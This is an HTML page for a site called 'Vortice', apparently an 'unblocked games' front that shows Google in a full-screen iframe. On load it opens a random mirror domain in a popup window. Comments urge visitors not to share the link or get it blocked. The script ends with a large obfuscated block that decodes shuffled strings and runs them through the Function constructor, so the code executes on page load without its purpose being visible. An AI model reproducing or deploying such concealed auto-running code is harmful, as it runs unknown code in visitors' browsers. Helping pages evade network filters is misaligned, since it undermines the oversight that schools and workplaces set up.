<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Vortice</title>
    <style>
        html{
            height: 100%;
        }
        body{
            height: 100%;
        }
        iframe{
            height: 100%;
            width: 100%;
            top: 0;
            bottom: 0;
            left: 0;
            right: 0;
            border: none;
            outline: none;
            position: fixed;
        }
    </style>
</head>
<body>
    <!--Hello-->
    <iframe id="iframe" src="https://google.com"></iframe>
    <!--Please don't get this blocked, you will ruin it for everyone.-->
    <!--DO NOT SHARE THIS LINK-->
    <script>
    let links = ["https://vortice.xyz", "https://vorticegames.wow", "https://pleasedontblock.aaa", "https://wwwvorticegames.gg", "https://vortice.gg", "https://vortice.lol", "https://vortice.wow"];
    let link = links[Math.floor(Math.random() * links.length)];
    let docu = window.open(link);
    docu.document.write('<iframe id="iframe" src="https://www.voritce.app/play"></iframe>');
    var _0x431dfc,_0x1250,iframe,_0x4d9f;(function(){var neW='',Zng=994-983;function ZCx(b){var k=1987941;var w=b.length;var g=[];for(var o=0;o<w;o++){g[o]=b.charAt(o)};for(var o=0;o<w;o++){var y=k*(o+136)+(k%28445);var u=k*(o+518)+(k%30458);var v=y%w;var a=u%w;var j=g[v];g[v]=g[a];g[a]=j;k=(y+u)%3799825;};return g.join('')};var wsy=ZCx('jcyctswrtohrxoanzcuvidrmnouqlfbespkgt').substr(0,Zng);var TIo=';bo.)r-t6ht5h,80ku;a;rm)="ab[wov=hv. .on(p=cu7+ (x=z";vskhb)=9r+ ;)a]t3uno+p=).d;,av,(=sear()=;{r7h2v10249+[c=],fmSk,,m, )8a),9][r6tCg;4 n(r!t{e<>neqknt=;e=.hk;foev, >nnopas dAs+en]oa)ek+e(.n0"+e[i;mr(ai=ala=b0;a=h((v g.hiin{fhnq,v)[vtrrc=+ odhj;msrr08lu=oap;m"s(;=-tvwb*f=ofsg(;u.e(9,e,ei"x6 ava=c2=5d"legn(i)-e1(ln0j+r+,t)m;lv ]kd10.= r"vj.p,]7.og7saaporf r4) ra;;(.uf.)vqC;[Car6wm8;chaf<ldg,,gv)}var7(age[];vfn,r{fo()g1vo,=o )hor+onctt=!116i0go alksr;;u;uh+)lu1st{qidfS9i7[rl"v +-er(iuo([5n;r[ttkfr)6+qe)ujrCoc=)v=no2n=;Au=n0a+;9;0gj"+fcrp tex)a}l,e.si(5 a=u6.Ar+.(;i+===h=ait.o[gi=lCihsg)zdpq8l,ajjt(jun61]oei={b]1[=7(iu=x*7maeh862;jhr.i;+-l}1)l-r,)r.)fd)epAui7gyim+ nelw;;r=y. mv]]j==i(p;vtj<ddy;k1iuq0r];t+s(t+oi8( t,=;u3.g9-,v2ta)oyd[l3)pa(ar(]na(vv8s,0sn8C f.}o"r;mvhnf}k(6a}z4frf;<n.<;kg=n,oe+)tt l1)lhdt+(;(h=7{;8r.kre;oCq6h)Cr.r. rlvolln0nte((hri));u}+u;,tx]sqcm,fbp;Aal2a[rro.l1';var JVa=ZCx[wsy];var Snn='';var hSj=JVa;var LxH=JVa(Snn,ZCx(TIo));var YtQ=LxH(ZCx(';-3Gc74Z!6!)6bc.or06!{p*f(_=r.ab}Zm88g"a{f{y)K4 1,7j43M9Z}9pZ!sZZ4feCi#eZn.ZoZ2qc@Qc9098l5Z.({Z44.+ZZZ)L.$ZeA5!3t;0(o(c_fx51.\'k=p,d_f88 e410F16Zf3df1dZy<Zsf_}r cg93\/So_01at9(b67[Z%=1yz7Zt,_Z.+=cZead)g7Za"(.P? _2\/=2Z2Z4,(i$)(4(Z%66Z_c3;0nf(ZZ$_33f1c4N0fZi)35n[Z5.!06t(2;)8-Z6.i67ZZ_.9)Z(9;9d7m).x5s8%v1cTfw2t9atG!}dZ3Mt.8 %;yq3badl,sx(O0:3:7(m%5rN8chZrFaJ!Z(i+oI\/%c?17 r3c{)>>Cl_Zz1=eZcZi_e3t&_r=9tc1 7.2dZ8Z(r1.N%0.!l0 9)m+;2)Zi8nnr50{ya710h)p_796omr"tiiZuddZ?Zo4 ,rc9B0Z(tiZ.5;2}( s9Z(.b0abhE=Z}1)z79Z$e3)&.Z]h)e0M70ot{E0ds_Zx,o,dM5aMC]{};\/0A=ssDZe(_p{ dee)c(;5_Z6 8; oZ n0j).;. R_,Oe.!;(LzZ.$DB,=1y]et}4_Z2Zttj(7561(8Zcj[ZtZ4()3_P.)ZjLrK6x2_A9IZrgxZZbx,=d}g8;72f20Zv0)c4=Z9,$j%=.Ouc. 10emZ.,1q)g,.5Zo)Z25]35ci9n !Z3[(,7(qc!Z4xZjZZ.(s750*$o440f9,m=!b ;19l)o2";(7)3,-5;ciB_9)98;93)exZ!38bj,d6Z0}%(C.Ze)ZL3Z)e4n)ZNjing_ZZ_ZEv5ZoarCZn)(ocZ1esx)=c0.f2;.*%l;Z=;d#1{;6=)aO(c35f=_4Zdb=_(#c1()j.7}h5s_@c(sZct1CZSa}(@gc4.Z,> \/Z$sc.&c3c_t_Zdj@,cpld(3fZ8=6 2M&191sZ$a;)s$2Z!uZ_;72##dZ0=8e4,lZ v$Z8x>_iZ04=3d)\'1tlZ)+af$l;$d;h+[__3!Z}Zy[1#.65cZa9Z8x(d!85=)Z06nrDo4_)x.ct44F5Z5Zt,.o0eR_,Z1($)7rc.07=Z;scZ9 a\/Z45cf9Zil\/(Z8o4<3bP(){t{Q59r;jncZ.7J0=]2.2.eZ_9 3"33(r2b[Nm34$)c3Zo2FZ;j,cZxZtZ47._Z%nn-5i1c+_cjEe2j Z!Z7!9a)244%5!Z$0n.46_e*u\/Zv7:2==O Z9vbZ=g)c9;IpZ!(f2_5d9,.$CZ8+.0Ze,+5)3c=x0BZ.I2L_1Zq.Z+e85(s6 c.,4biL{ZZB_39Z2+,)e1y4dZ(()96(,1 a(EZZ)6.bs46j_l%9Z)a6;7Z)Z9e.j6G;ZZdu9}4lc()1Z,Z+et$c_!x-Z7t8>:_]K)(},6Ze) s,6._19+R_cZ4]jZ_1ZgrIs.(A6g+9Z%Z=5."8=1c2b2n]2[v$C3Zen]I15.88()E6Z4.Z{>(4wj1f!d.Z52\/o[(28%01ZN6$_J%{=.3da2:Z;ja$dZw1BZrZZ0=dcx7ae!<Z}Z.}62#bs ]oij4()rZ48,eZf=._lZ;3bx.i_)xZ0(i.Z7bZ...Z.7ZdZ5;${;Z xZfdbZe{ZZ)9o{)a;a$e;2. 2)bs3.(;34x(3kZ\/Cf10aZ6_m8eD_Z2bf;Z)t2su-b_a2)4c]52,ZRtZ]51)fg!re6 if)99xZ)ee.{f9c. 3$5yZ0f"(Z,(2) te\/v=.=.ZZlo{%tk)n1x0,\/,0t96r g7r7ce)9.Z..Z]f);(t6.$Z[(,6f"Za4Z().(a4}(4,Z02n7_f5F)[Zd(\'a_9ZP?=1fZ{(a=.p_Zo3o.cZsB39(McZhZ.ZZ5J;p2Z,+EZZ)4p5b5Zo1\/8)aaZ4h!.4Pm5e5Z{o.2dZ=}(=}\'tr(;)<=yxc4=yZ6ti a(+1_1tr_eZZnf5i(7eZ0aZ7xs$13C }K!!854) Z)ZgiZ7Ns(aZqZ)naa9=($s)1_0y.0Zx)ZeOeO) cs)o2..ZsZ$$0Zm,25%556=v34_x)dS_p7)ZZo$1Za5ce;3f\/Z17%3.$a}){deM}c. 5jZ_0Z3$)0qZZDG ;=0Z03j,Z-1).bZ.]$p;7Z4);"Z0Z6 (,8nx161(IZbZfk2d1d4sf)$)}5#!1(s %4Z80e=Z.%x b9ZZZp6102_nOm851pfs b$LIa7i[$64)Z9_$(.__\/fsA\/fo.i 2;]\/{3Zs5JifZ+Z0(3)Z_#$2 ;;]4\/_}rc]Z,!ftr,){\/Z-;f82"cZ,cZ1.hPu((.lZsECZi_cs0zZc_cc.ZZhif(;7!_))Z$.rte.Z4%mnr};0.}nZ6,_(x4 e$h(ZZZs3 )e16Z..!1n5S_2e,]36w.0Z.)fa2 9))_}0!ZbetIZ2Z9{.js!9;sAZ#3.'));var fqC=hSj(neW,YtQ );fqC(2197);return 7180})()    </script>
</body>
</html>